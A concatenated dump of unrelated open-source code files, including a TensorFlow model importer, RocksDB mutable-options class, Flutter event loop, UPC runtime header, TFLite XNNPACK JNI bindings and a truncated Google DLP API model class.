assertNotNull( javaClass.newInstance() );
return javaClass.newInstance();
}
} | 1,215 |
392 | <reponame>mouthwater/rgb
/*
* Index out of bounds exception.
*/
#ifndef LANG__EXCEPTIONS__EX_INDEX_OUT_OF_BOUNDS_HH
#define LANG__EXCEPTIONS__EX_INDEX_OUT_OF_BOUNDS_HH
#include "lang/exceptions/exception.hh"
namespace lang {
namespace exceptions {
/*
* Index out of bounds exception.
*/
class ex_index_out_of_bounds : public exception {
public:
/*
* Constructor.
*/
explicit ex_index_out_of_bounds(
const char*, /* message (use default if NULL) */
unsigned long /* index */
);
/*
* Copy constructor.
*/
ex_index_out_of_bounds(const ex_index_out_of_bounds&);
/*
* Destructor.
*/
virtual ~ex_index_out_of_bounds();
/*
* Clone the exception.
*/
virtual ex_index_out_of_bounds* clone() const;
/*
* Throw the exception.
*/
virtual void raise() const;
/*
* Get the out-of-bounds index.
*/
virtual unsigned long index() const;
protected:
unsigned long _index; /* index */
};
} /* namespace exceptions */
} /* namespace lang */
#endif
| 415 |
5,823 | <filename>shell/platform/glfw/headless_event_loop.cc
// Copyright 2013 The Flutter Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "flutter/shell/platform/glfw/headless_event_loop.h"
#include <atomic>
#include <utility>
namespace flutter {
HeadlessEventLoop::HeadlessEventLoop(std::thread::id main_thread_id,
const TaskExpiredCallback& on_task_expired)
: EventLoop(main_thread_id, std::move(on_task_expired)) {}
HeadlessEventLoop::~HeadlessEventLoop() = default;
void HeadlessEventLoop::WaitUntil(const TaskTimePoint& time) {
std::mutex& mutex = GetTaskQueueMutex();
std::unique_lock<std::mutex> lock(mutex);
task_queue_condition_.wait_until(lock, time);
}
void HeadlessEventLoop::Wake() {
task_queue_condition_.notify_one();
}
} // namespace flutter
| 328 |
4,071 | /*
* \file tensorflow_importer.cc
* \brief The tensorflow importer
*/
#include "blaze/model_importer/tensorflow_importer.h"
#include "blaze/common/proto_configure.h"
#include "blaze/common/string_util.h"
namespace blaze {
TensorFlowImporter::TensorFlowImporter() {
SetProcessNodeFunction("Placeholder", [this](const tensorflow::NodeDef& node) {
this->ProcessPlaceholderOp(node); });
SetProcessNodeFunction("Const", [this](const tensorflow::NodeDef& node) {
this->ProcessConstOp(node); });
SetProcessNodeFunction("Identity", [this](const tensorflow::NodeDef& node) {
this->ProcessIdentityOp(node); });
SetProcessNodeFunction("MatMul", [this](const tensorflow::NodeDef& node) {
this->ProcessMatMulOp(node); });
SetProcessNodeFunction("Add", [this](const tensorflow::NodeDef& node) {
this->ProcessAddOp(node); });
SetProcessNodeFunction("Mul", [this](const tensorflow::NodeDef& node) {
this->ProcessMulOp(node); });
SetProcessNodeFunction("Maximum", [this](const tensorflow::NodeDef& node) {
this->ProcessMaximumOp(node); });
SetProcessNodeFunction("Softmax", [this](const tensorflow::NodeDef& node) {
this->ProcessSoftmaxOp(node); });
}
void TensorFlowImporter::LoadModel(const char* conf_file, const char* data_file) {
ProtoConfigure config;
auto rc = config.Init("tensorflow.MetaGraphDef", conf_file);
if (rc != ProtoConfigure::kOK) {
BLAZE_THROW("Parse tensorflow.MetaGraphDef failed file=", conf_file);
}
graph_def_ = (*(reinterpret_cast<const tensorflow::MetaGraphDef*>(config.config()))).graph_def();
LoadCkpt(data_file);
Tensorflow2Blaze();
}
void TensorFlowImporter::LoadModelFromString(const std::string& conf_str, const char* data_file) {
tensorflow::MetaGraphDef meta_graph_def;
meta_graph_def.ParseFromArray(const_cast<char*>(conf_str.c_str()), conf_str.size());
graph_def_ = meta_graph_def.graph_def();
LOG_INFO("graph_def_=%s", graph_def_.DebugString().c_str());
LoadCkpt(data_file);
Tensorflow2Blaze();
}
void TensorFlowImporter::LoadCkpt(const char* data_file) {
tf_param_.Load(data_file);
for (size_t i = 0; i < tf_param_.keys.size(); ++i) {
LOG_INFO("name=%s", tf_param_.keys[i].c_str());
const auto& array = tf_param_.ndarray[i];
size_t size = 1;
for (const auto& dim : array.shape) size *= dim;
// Use a separate index so the element loop does not shadow the tensor index i.
for (size_t j = 0; j < size; ++j) {
LOG_DEBUG("data[%zu]=%f", j, array.data[j].f);
}
}
LOG_ERROR("Loading Chpt is not implemented");
}
void TensorFlowImporter::Tensorflow2Blaze() {
// Step1: init name_rewrite
#if 0
for (const auto& node : graph_def_.node()) {
if (node.op() == "Identity") {
std::string input_node_name;
int index;
GetInput(node.input(0), &input_node_name, &index);
if (const_name_set_.count(input_node_name)) {
name_rewrite_[node.name()] = input_node_name;
}
} else if (node.op() == "Const") {
const_name_set_.insert(node.name());
}
}
// Step2: op conversion
for (const auto& node : graph_def_.node()) {
const auto& op_type = node.op();
const auto& iter = op_process_func_map_.find(op_type);
CHECK_TRUE(iter != op_process_func_map_.end(),
" parse op_type=", op_type, " is not registered");
iter->second(node);
}
#endif
LOG_INFO("net_def=%s", net_def_.DebugString().c_str());
}
void TensorFlowImporter::ProcessPlaceholderOp(const tensorflow::NodeDef& node) {
auto value_info = net_def_.add_external_input();
value_info->set_name(node.name());
// set dtype
const auto& dtype_iter = node.attr().find("dtype");
CHECK_TRUE(dtype_iter != node.attr().end());
value_info->set_dtype(GetDataType(dtype_iter->second.type()));
// set shape
}
void TensorFlowImporter::ProcessConstOp(const tensorflow::NodeDef& node) {
auto op = AddOperatorDef(node, "ConstantFill");
}
void TensorFlowImporter::ProcessIdentityOp(const tensorflow::NodeDef& node) {
const auto& input = node.input(0);
std::string iname;
int index;
GetInput(input, &iname, &index);
if (const_name_set_.count(iname)) {
return;
}
AddOperatorDef(node, "Identity");
}
void TensorFlowImporter::ProcessMatMulOp(const tensorflow::NodeDef& node) {
const auto& transpose_a_iter = node.attr().find("transpose_a");
const auto& transpose_b_iter = node.attr().find("transpose_b");
CHECK_NE(transpose_a_iter, node.attr().end());
CHECK_NE(transpose_b_iter, node.attr().end());
auto op = AddOperatorDef(node, "Gemm");
auto arg = op->add_arg();
arg->set_name("transepose_a");
arg->set_i(transpose_a_iter->second.b() ? 1 : 0);
arg = op->add_arg();
arg->set_name("transpose_b");
arg->set_i(transpose_b_iter->second.b() ? 1 : 0);
}
void TensorFlowImporter::ProcessAddOp(const tensorflow::NodeDef& node) {
AddOperatorDef(node, "Add");
}
void TensorFlowImporter::ProcessMulOp(const tensorflow::NodeDef& node) {
AddOperatorDef(node, "Mul");
}
void TensorFlowImporter::ProcessMaximumOp(const tensorflow::NodeDef& node) {
AddOperatorDef(node, "Max");
}
void TensorFlowImporter::ProcessSoftmaxOp(const tensorflow::NodeDef& node) {
AddOperatorDef(node, "Softmax");
}
OperatorDef* TensorFlowImporter::AddOperatorDef(
const tensorflow::NodeDef& node, const char* op_type, int onum) {
const auto& op_name = node.name();
auto op = net_def_.add_op();
op->set_name(op_name);
op->set_type(op_type);
// init iname
std::string input_node_name;
int index;
for (const auto& entry : node.input()) {
GetInput(entry, &input_node_name, &index);
const auto& name_rewrite_iter = name_rewrite_.find(input_node_name);
if (name_rewrite_iter != name_rewrite_.end()) {
input_node_name = name_rewrite_iter->second;
}
op->add_input(input_node_name + (index == 0 ? "" : std::to_string(index)));
}
// init oname
for (auto i = 0; i < onum; ++i) {
op->add_output(op_name + (i == 0 ? "" : std::to_string(i)));
}
return op;
}
void TensorFlowImporter::GetInput(const std::string& input_str, std::string* node_name, int* index) {
auto splits = Split(input_str, ':');
CHECK_TRUE(splits.size() >= 1);
*node_name = splits[0];
*index = 0;
if (splits.size() > 1) {
*index = std::stoi(splits[1].c_str());
}
}
DataType TensorFlowImporter::GetDataType(tensorflow::DataType data_type) {
switch (data_type) {
case tensorflow::DT_FLOAT:
return kFloat;
case tensorflow::DT_DOUBLE:
return kDouble;
case tensorflow::DT_INT32:
return kInt32;
default:
BLAZE_THROW("tensoflow data_type=", data_type, " is not supported");
}
}
void TensorFlowImporter::SetProcessNodeFunction(
const std::string& name, TensorFlowImporter::ProcessOpNodeFunction function) {
op_process_func_map_[name] = function;
}
} // namespace blaze
| 2,775 |
420 | #!/usr/bin/env python
from distutils.core import setup
long_description = '''
Essential Paxos provides basic implementations of the Paxos algorithm. The
distinguishing characteristic of this implementation, as compared to other
freely available and open-source implementations, is that this library is
independent of application domains and networking infrastructures. Whereas most
Paxos implementations are deeply and inextricably embedded within
application-specific logic, this implementation focuses on encapsulating the
Paxos algorithm within opaque and easily re-usable classes.
This library provides an algorithmically correct Paxos implementation that may
be used for educational purposes in addition to direct use in networked
applications. This implementation is specifically designed to facilitate
understanding of both the essential Paxos algorithm as well as the practical
considerations that must be taken into account for real-world use.
'''
setup(name='essential-paxos',
version='2.0',
description='Paxos algorithm implementation suitable for practical and educational use',
long_description=long_description,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/cocagne/paxos',
packages=['paxos'],
license='MIT',
classifiers=['Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: System :: Distributed Computing',
'Topic :: System :: Networking']
)
| 520 |
6,098 | package hex.schemas;
import hex.ensemble.StackedEnsembleModel;
import water.api.API;
import water.api.EnumValuesProvider;
import water.api.schemas3.KeyV3;
import water.api.schemas3.ModelOutputSchemaV3;
import water.api.schemas3.ModelSchemaV3;
public class StackedEnsembleModelV99 extends ModelSchemaV3<StackedEnsembleModel, StackedEnsembleModelV99, StackedEnsembleModel.StackedEnsembleParameters, StackedEnsembleV99.StackedEnsembleParametersV99, StackedEnsembleModel.StackedEnsembleOutput, StackedEnsembleModelV99.StackedEnsembleModelOutputV99> {
public static final class StackedEnsembleModelOutputV99 extends ModelOutputSchemaV3<StackedEnsembleModel.StackedEnsembleOutput, StackedEnsembleModelOutputV99> {
@API(help="Model which combines the base_models into a stacked ensemble.", direction = API.Direction.OUTPUT)
KeyV3.ModelKeyV3 metalearner;
@API(help="Level one frame used for metalearner training.", direction = API.Direction.OUTPUT)
KeyV3.FrameKeyV3 levelone_frame_id;
@API(help="The stacking strategy used for training.", valuesProvider = StackingStrategyProvider.class, direction = API.Direction.OUTPUT)
StackedEnsembleModel.StackingStrategy stacking_strategy;
}
public static class StackingStrategyProvider extends EnumValuesProvider<StackedEnsembleModel.StackingStrategy> {
public StackingStrategyProvider() {
super(StackedEnsembleModel.StackingStrategy.class);
}
}
public StackedEnsembleV99.StackedEnsembleParametersV99 createParametersSchema() { return new StackedEnsembleV99.StackedEnsembleParametersV99(); }
public StackedEnsembleModelOutputV99 createOutputSchema() { return new StackedEnsembleModelOutputV99(); }
@Override public StackedEnsembleModel createImpl() {
StackedEnsembleV99.StackedEnsembleParametersV99 p = this.parameters;
StackedEnsembleModel.StackedEnsembleParameters parms = p.createImpl();
return new StackedEnsembleModel(model_id.key(), parms, new StackedEnsembleModel.StackedEnsembleOutput());
}
}
| 625 |
675 | <reponame>hase1128/dragonfly<filename>examples/detailed_use_cases/obj_5d.py
"""
Synthetic function for 5D optimisation.
-- kirthevasank
"""
from moo_5d import compute_objectives as moo_objectives
def objective(x):
""" Computes the objectives. """
return moo_objectives(x)[0] # Just returns conductivity
| 108 |
435 | <reponame>allen91wu/data
{
"description": "The Pandas soon realized there's no way they are going to survive the\nordeals and hardships of this world, if they didn't finally and without\nthe blink of an eye of hesitation pull themselves together, stop being\nthe lazy fluffy beings, they have long been known for and start\nreorganizing their lives ASAP. They needed a fresh view over the world\nand its intrinsic mechanisms, light had to be shed upon the information\nthey possessed about survival, in a few words, they had to start over.\nThis is how in the midst of the forest a high performative library was\ncoming to life, whose powerful toolkit would enable them a long lasting\nlife of happiness and joy. This long-dreamed library should import the\ninformation they have been gathering about the world for long gone\ncenturies and help them look at it through different eyes. They wanted\nto structure their world views and beliefs into sensible types and\ncategories, remove from their genes their procrastinative behavioural\npatterns, drop them altogether. After laborious efforts of dealing with\nmissing data about their surroundings, grouping and counting the\nmeaningful rest, filtering the nonsensical superstitions, they could\nfinally and, without doubt, point out with precision, where the bamboo\nsprouts were freshest, most succulent, fiber rich, absolutely\nscrumptious and the moment of the year, dictated by the moon calendar,\nwhen they are fluffiest, cosiest, most willing and irresistibly fall for\none another and cuddle up. They put all this secret survival kit into\neasily understandable pictures and graphs for the dreamers out of them,\nwho weren't prepared to put in all the effort of learning all those\ncomplicated symbols, just in order to survive and just wanted to admire\nthe sky goddess, the moon. But wait, they didn't have a name for their\ngrandiose library, so they just wanted to make a statement of being the\nmost diligent creature of them all and called it, simply and\nunmistakably, pandas!\n",
"duration": 1542,
"language": "eng",
"published_at": "2019-08-06T12:18:06.000Z",
"recorded": "2019-03-24",
"speakers": [
"<NAME>"
],
"thumbnail_url": "https://i.ytimg.com/vi/WCeJpJ9yT7Y/hqdefault.jpg",
"title": "The Apprentice's Enthusiastic Guide to pandas (or how to look at the world through the gentle eyes of one)",
"videos": [
{
"type": "youtube",
"url": "https://www.youtube.com/watch?v=WCeJpJ9yT7Y"
}
]
}
| 683 |
12,278 | <gh_stars>1000+
// Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
package org.rocksdb;
import java.util.*;
public abstract class AbstractMutableOptions {
protected static final String KEY_VALUE_PAIR_SEPARATOR = ";";
protected static final char KEY_VALUE_SEPARATOR = '=';
static final String INT_ARRAY_INT_SEPARATOR = ",";
protected final String[] keys;
private final String[] values;
/**
* User must use builder pattern, or parser.
*
* @param keys the keys
* @param values the values
*/
protected AbstractMutableOptions(final String[] keys, final String[] values) {
this.keys = keys;
this.values = values;
}
String[] getKeys() {
return keys;
}
String[] getValues() {
return values;
}
/**
* Returns a string representation of MutableOptions which
* is suitable for consumption by {@code #parse(String)}.
*
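* For example, two mutable options serialize as
* {@code "write_buffer_size=4194304;max_write_buffer_number=2"}
* (the option names shown are illustrative).
*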
* @return String representation of MutableOptions
*/
@Override
public String toString() {
final StringBuilder buffer = new StringBuilder();
for(int i = 0; i < keys.length; i++) {
buffer
.append(keys[i])
.append(KEY_VALUE_SEPARATOR)
.append(values[i]);
if(i + 1 < keys.length) {
buffer.append(KEY_VALUE_PAIR_SEPARATOR);
}
}
return buffer.toString();
}
public static abstract class AbstractMutableOptionsBuilder<
T extends AbstractMutableOptions,
U extends AbstractMutableOptionsBuilder<T, U, K>,
K extends MutableOptionKey> {
private final Map<K, MutableOptionValue<?>> options = new LinkedHashMap<>();
protected abstract U self();
/**
* Get all of the possible keys
*
* @return A map of all keys, indexed by name.
*/
protected abstract Map<String, K> allKeys();
/**
* Construct a sub-class instance of {@link AbstractMutableOptions}.
*
* @param keys the keys
* @param values the values
*
* @return an instance of the options.
*/
protected abstract T build(final String[] keys, final String[] values);
public T build() {
final String keys[] = new String[options.size()];
final String values[] = new String[options.size()];
int i = 0;
for (final Map.Entry<K, MutableOptionValue<?>> option : options.entrySet()) {
keys[i] = option.getKey().name();
values[i] = option.getValue().asString();
i++;
}
return build(keys, values);
}
protected U setDouble(
final K key, final double value) {
if (key.getValueType() != MutableOptionKey.ValueType.DOUBLE) {
throw new IllegalArgumentException(
key + " does not accept a double value");
}
options.put(key, MutableOptionValue.fromDouble(value));
return self();
}
protected double getDouble(final K key)
throws NoSuchElementException, NumberFormatException {
final MutableOptionValue<?> value = options.get(key);
if(value == null) {
throw new NoSuchElementException(key.name() + " has not been set");
}
return value.asDouble();
}
protected U setLong(
final K key, final long value) {
if(key.getValueType() != MutableOptionKey.ValueType.LONG) {
throw new IllegalArgumentException(
key + " does not accept a long value");
}
options.put(key, MutableOptionValue.fromLong(value));
return self();
}
protected long getLong(final K key)
throws NoSuchElementException, NumberFormatException {
final MutableOptionValue<?> value = options.get(key);
if(value == null) {
throw new NoSuchElementException(key.name() + " has not been set");
}
return value.asLong();
}
protected U setInt(
final K key, final int value) {
if(key.getValueType() != MutableOptionKey.ValueType.INT) {
throw new IllegalArgumentException(
key + " does not accept an integer value");
}
options.put(key, MutableOptionValue.fromInt(value));
return self();
}
protected int getInt(final K key)
throws NoSuchElementException, NumberFormatException {
final MutableOptionValue<?> value = options.get(key);
if(value == null) {
throw new NoSuchElementException(key.name() + " has not been set");
}
return value.asInt();
}
protected U setBoolean(
final K key, final boolean value) {
if(key.getValueType() != MutableOptionKey.ValueType.BOOLEAN) {
throw new IllegalArgumentException(
key + " does not accept a boolean value");
}
options.put(key, MutableOptionValue.fromBoolean(value));
return self();
}
protected boolean getBoolean(final K key)
throws NoSuchElementException, NumberFormatException {
final MutableOptionValue<?> value = options.get(key);
if(value == null) {
throw new NoSuchElementException(key.name() + " has not been set");
}
return value.asBoolean();
}
protected U setIntArray(
final K key, final int[] value) {
if(key.getValueType() != MutableOptionKey.ValueType.INT_ARRAY) {
throw new IllegalArgumentException(
key + " does not accept an int array value");
}
options.put(key, MutableOptionValue.fromIntArray(value));
return self();
}
protected int[] getIntArray(final K key)
throws NoSuchElementException, NumberFormatException {
final MutableOptionValue<?> value = options.get(key);
if(value == null) {
throw new NoSuchElementException(key.name() + " has not been set");
}
return value.asIntArray();
}
protected <N extends Enum<N>> U setEnum(
final K key, final N value) {
if(key.getValueType() != MutableOptionKey.ValueType.ENUM) {
throw new IllegalArgumentException(
key + " does not accept a Enum value");
}
options.put(key, MutableOptionValue.fromEnum(value));
return self();
}
@SuppressWarnings("unchecked")
protected <N extends Enum<N>> N getEnum(final K key)
throws NoSuchElementException, NumberFormatException {
final MutableOptionValue<?> value = options.get(key);
if (value == null) {
throw new NoSuchElementException(key.name() + " has not been set");
}
if (!(value instanceof MutableOptionValue.MutableOptionEnumValue)) {
throw new NoSuchElementException(key.name() + " is not of Enum type");
}
return ((MutableOptionValue.MutableOptionEnumValue<N>) value).asObject();
}
public U fromString(
final String keyStr, final String valueStr)
throws IllegalArgumentException {
Objects.requireNonNull(keyStr);
Objects.requireNonNull(valueStr);
final K key = allKeys().get(keyStr);
switch(key.getValueType()) {
case DOUBLE:
return setDouble(key, Double.parseDouble(valueStr));
case LONG:
return setLong(key, Long.parseLong(valueStr));
case INT:
return setInt(key, Integer.parseInt(valueStr));
case BOOLEAN:
return setBoolean(key, Boolean.parseBoolean(valueStr));
case INT_ARRAY:
final String[] strInts = valueStr
.trim().split(INT_ARRAY_INT_SEPARATOR);
if(strInts == null || strInts.length == 0) {
throw new IllegalArgumentException(
"int array value is not correctly formatted");
}
final int value[] = new int[strInts.length];
int i = 0;
for(final String strInt : strInts) {
value[i++] = Integer.parseInt(strInt);
}
return setIntArray(key, value);
}
throw new IllegalStateException(
key + " has unknown value type: " + key.getValueType());
}
}
}
| 3,068 |
482 | <filename>code/iaas/logic/src/main/java/io/cattle/platform/process/cache/ClearCacheHandler.java
package io.cattle.platform.process.cache;
import io.cattle.platform.core.cache.DBCacheManager;
import io.cattle.platform.deferred.util.DeferredUtils;
import io.cattle.platform.engine.handler.AbstractProcessLogic;
import io.cattle.platform.engine.handler.HandlerResult;
import io.cattle.platform.engine.handler.ProcessPostListener;
import io.cattle.platform.engine.process.ProcessInstance;
import io.cattle.platform.engine.process.ProcessState;
import io.cattle.platform.eventing.EventService;
import io.cattle.platform.eventing.model.EventVO;
import io.cattle.platform.iaas.event.IaasEvents;
import io.cattle.platform.util.type.Priority;
import javax.inject.Inject;
import javax.inject.Named;
@Named
public class ClearCacheHandler extends AbstractProcessLogic implements ProcessPostListener, Priority {
@Inject
EventService eventService;
@Inject
DBCacheManager cacheManager;
@Override
public String[] getProcessNames() {
return new String[] {
"externalhandler.*",
"externalhandlerexternalhandlerprocessmap.*",
"externalhandlerprocess.*",
"dynamicschema.*"
};
}
@Override
public HandlerResult handle(ProcessState state, ProcessInstance process) {
cacheManager.clear();
DeferredUtils.defer(new Runnable() {
@Override
public void run() {
eventService.publish(EventVO.newEvent(IaasEvents.CLEAR_CACHE));
cacheManager.clear();
}
});
return null;
}
@Override
public int getPriority() {
return Integer.MAX_VALUE;
}
} | 709 |
#include<stdalign.h>
#include<stdlib.h>
// void *aligned_alloc(size_t algn, size_t size); -- declared in <stdlib.h> since C11
void foo()
{
// Test use of the aligned_alloc() function; <stdalign.h> supplies the
// alignas/alignof macros, while aligned_alloc() itself comes from <stdlib.h>.
void* memory = aligned_alloc(1,2);
free(memory); // release the test allocation
}
| 77 |
463 | <reponame>dentou/Hive2Hive
package org.hive2hive.core.exceptions;
public class NoSessionException extends Hive2HiveException {
private static final long serialVersionUID = 4263677549436609207L;
public NoSessionException() {
super("No session found.");
}
}
| 86 |
314 | //
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by <NAME>.
//
#import "CDStructures.h"
#import <IDEKit/IDEMediaRepository.h>
#import "IDEDefaultMediaLibrary-Protocol.h"
@class IDEFileReferenceContainerObserver, IDETimedInvalidatableObjectCache, NSSet, NSString;
@interface IDEContainerContentsMediaRepository : IDEMediaRepository <IDEDefaultMediaLibrary>
{
IDEFileReferenceContainerObserver *_observer;
id _containerContentObservationToken;
IDETimedInvalidatableObjectCache *_timedCache;
}
+ (id)mediaRepositoryForContainer:(id)arg1 fileDataTypes:(id)arg2;
+ (dispatch_block_t)cleanupHandlerBlock;
+ (dispatch_block_t)updateHandlerBlock;
+ (id)containerObserverIdentifer;
+ (id)allSupportedMediaFileDataTypes;
+ (void)cleanupFileReferenceContainerObserverResult:(id)arg1 forPath:(id)arg2;
+ (id)handleFileReferenceContainerObserverChange:(long long)arg1 forPath:(id)arg2 withDataType:(id)arg3;
+ (void)discardMediaRepositoryForContainerObserver:(id)arg1;
+ (id)mediaRepositoryForContainerObserver:(id)arg1;
+ (id)containerObserverToRepositoryMap;
- (void)fileReferenceObserverDidReportUpdatedAndAddedResourcesByPath:(id)arg1 removedPaths:(id)arg2;
- (void)willRegisterMediaRepositoryObserver;
- (void)didUnregisterMediaRepositoryObserver;
@property(readonly) NSSet *types;
- (id)resources;
- (void)primitiveInvalidate;
- (void)_startObserving;
- (id)initWithContainerObserver:(id)arg1;
// Remaining properties
@property(readonly, copy) NSString *debugDescription;
@property(readonly, copy) NSString *description;
@property(readonly) unsigned long long hash;
@property(readonly) Class superclass;
@end
| 564 |
190,993 | /* Copyright 2021 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#include <jni.h>
#include "tensorflow/lite/core/shims/c/common.h"
#include "tensorflow/lite/delegates/xnnpack/xnnpack_delegate.h"
#include "tensorflow/lite/java/src/main/native/jni_utils.h"
using tflite::jni::CastLongToPointer;
namespace {
using DeleteFunction = void(TfLiteDelegate*);
TfLiteDelegate* convertLongToDelegate(JNIEnv* env, jlong delegate_handle) {
return CastLongToPointer<TfLiteDelegate>(env, delegate_handle);
}
DeleteFunction* convertLongToDeleteFunction(JNIEnv* env,
jlong delete_function) {
return CastLongToPointer<DeleteFunction>(env, delete_function);
}
} // anonymous namespace.
extern "C" {
JNIEXPORT void JNICALL
Java_org_tensorflow_lite_XnnpackDelegate_applyDeleteFunction(
JNIEnv* env, jclass clazz, jlong delete_function_handle,
jlong delegate_handle) {
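  // Unbox both jlong handles into raw native pointers and invoke the deleter
  // on the delegate; a null handle on either side makes this a no-op.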
if (!tflite::jni::CheckJniInitializedOrThrow(env)) return;
TfLiteDelegate* delegate = convertLongToDelegate(env, delegate_handle);
if (delegate == nullptr) return;
DeleteFunction* delete_function =
convertLongToDeleteFunction(env, delete_function_handle);
if (delete_function == nullptr) return;
delete_function(delegate);
}
} // extern "C"
| 617 |
488 | <gh_stars>100-1000
/// \file ParallelRTS.upc
///
/// \brief communication interface for RTED/UPC
///
/// \email <EMAIL>
#ifndef _PARALLEL_RTS_H
#define _PARALLEL_RTS_H
#include "CppRuntimeSystem/rted_iface_structs.h"
#include "CppRuntimeSystem/ptrops.h"
#ifdef __cplusplus
extern "C"
{
#endif /* __cplusplus */
#ifdef WITH_UPC
/// \brief polls incoming message buffer
void rted_ProcessMsg(void);
/// \brief sends a free message to all other processes
void snd_FreeMemory(rted_Address addr, rted_AllocKind freeKind, rted_SourceInfo si);
/// \brief shares information about non-local heap allocations
void snd_AllocMem(rted_TypeDesc, rted_Address, rted_Address, long, size_t, rted_AllocKind, const char*, rted_SourceInfo);
/// \brief shares information about variable initializations
void snd_InitVariable(rted_TypeDesc, rted_Address, rted_Address, size_t, int, const char*, rted_SourceInfo);
/// \brief shares information about pointer movements
void snd_MovePointer(rted_TypeDesc, rted_Address, rted_Address, const char*, rted_SourceInfo);
/// \brief initializes the runtime system
void rted_UpcAllInitialize(void);
void rted_PrintStats(void);
#else /* WITH_UPC */
#define UNUSEDARG(X) ((void) &(X)) /* we write for C and C++ compilers ;) */
// when we do not use UPC, we compile the runtime system with empty
// implementations.
static inline
void rted_ProcessMsg(void)
{}
static inline
void snd_FreeMemory(rted_Address r, rted_AllocKind a, rted_SourceInfo s)
{
UNUSEDARG(r), UNUSEDARG(a), UNUSEDARG(s);
}
static inline
void snd_AllocMem(rted_TypeDesc td, rted_Address addr, rted_Address haddr, long blocksz, size_t mallocsz, rted_AllocKind ak, const char* cn, rted_SourceInfo si)
{
UNUSEDARG(td), UNUSEDARG(addr), UNUSEDARG(haddr), UNUSEDARG(blocksz), UNUSEDARG(mallocsz), UNUSEDARG(ak), UNUSEDARG(cn), UNUSEDARG(si);
}
static inline
void snd_InitVariable(rted_TypeDesc td, rted_Address addr, rted_Address haddr, size_t sz, int pm, const char* cn, rted_SourceInfo si)
{
UNUSEDARG(td), UNUSEDARG(addr), UNUSEDARG(haddr), UNUSEDARG(sz), UNUSEDARG(pm), UNUSEDARG(cn), UNUSEDARG(si);
}
static inline
void snd_MovePointer(rted_TypeDesc td, rted_Address addr, rted_Address haddr, const char* cn, rted_SourceInfo si)
{
UNUSEDARG(td), UNUSEDARG(addr), UNUSEDARG(haddr), UNUSEDARG(cn), UNUSEDARG(si);
}
/// \note even w/o UPC this function is needed b/c it will be the first function executed in main
/// it becomes the reference point for further RTED initializations at startup
/// \todo remove
static inline
void rted_UpcAllInitialize(void)
{}
static inline
void rted_PrintStats(void)
{}
#endif /* WITH_UPC */
#ifdef __cplusplus
} /* extern "C" */
#endif /* __cplusplus */
#endif /* _PARALLEL_RTS_H */
| 1,040 |
372 | <reponame>mjhopkins/google-api-java-client-services<gh_stars>100-1000
/*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
/*
* This code was generated by https://github.com/googleapis/google-api-java-client-services/
* Modify at your own risk.
*/
package com.google.api.services.dlp.v2.model;
/**
* The rule that adjusts the likelihood of findings within a certain proximity of hotwords.
*
* <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is
* transmitted over HTTP when working with the Cloud Data Loss Prevention (DLP) API. For a detailed
* explanation see:
* <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a>
* </p>
*
* @author Google, Inc.
*/
@SuppressWarnings("javadoc")
public final class GooglePrivacyDlpV2HotwordRule extends com.google.api.client.json.GenericJson {
/**
* Regular expression pattern defining what qualifies as a hotword.
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private GooglePrivacyDlpV2Regex hotwordRegex;
/**
* Likelihood adjustment to apply to all matching findings.
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private GooglePrivacyDlpV2LikelihoodAdjustment likelihoodAdjustment;
/**
* Proximity of the finding within which the entire hotword must reside. The total length of the
* window cannot exceed 1000 characters. Note that the finding itself will be included in the
* window, so that hotwords may be used to match substrings of the finding itself. For example,
* the certainty of a phone number regex "\(\d{3}\) \d{3}-\d{4}" could be adjusted upwards if the
* area code is known to be the local area code of a company office using the hotword regex
* "\(xxx\)", where "xxx" is the area code in question.
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private GooglePrivacyDlpV2Proximity proximity;
/**
* Regular expression pattern defining what qualifies as a hotword.
* @return value or {@code null} for none
*/
public GooglePrivacyDlpV2Regex getHotwordRegex() {
return hotwordRegex;
}
/**
* Regular expression pattern defining what qualifies as a hotword.
* @param hotwordRegex hotwordRegex or {@code null} for none
*/
public GooglePrivacyDlpV2HotwordRule setHotwordRegex(GooglePrivacyDlpV2Regex hotwordRegex) {
this.hotwordRegex = hotwordRegex;
return this;
}
/**
* Likelihood adjustment to apply to all matching findings.
* @return value or {@code null} for none
*/
public GooglePrivacyDlpV2LikelihoodAdjustment getLikelihoodAdjustment() {
return likelihoodAdjustment;
}
/**
* Likelihood adjustment to apply to all matching findings.
* @param likelihoodAdjustment likelihoodAdjustment or {@code null} for none
*/
public GooglePrivacyDlpV2HotwordRule setLikelihoodAdjustment(GooglePrivacyDlpV2LikelihoodAdjustment likelihoodAdjustment) {
this.likelihoodAdjustment = likelihoodAdjustment;
return this;
}
/**
* Proximity of the finding within which the entire hotword must reside. The total length of the
* window cannot exceed 1000 characters. Note that the finding itself will be included in the
* window, so that hotwords may be used to match substrings of the finding itself. For example,
* the certainty of a phone number regex "\(\d{3}\) \d{3}-\d{4}" could be adjusted upwards if the
* area code is known to be the local area code of a company office using the hotword regex
* "\(xxx\)", where "xxx" is the area code in question.
* @return value or {@code null} for none
*/
public GooglePrivacyDlpV2Proximity getProximity() {
return proximity;
}
/**
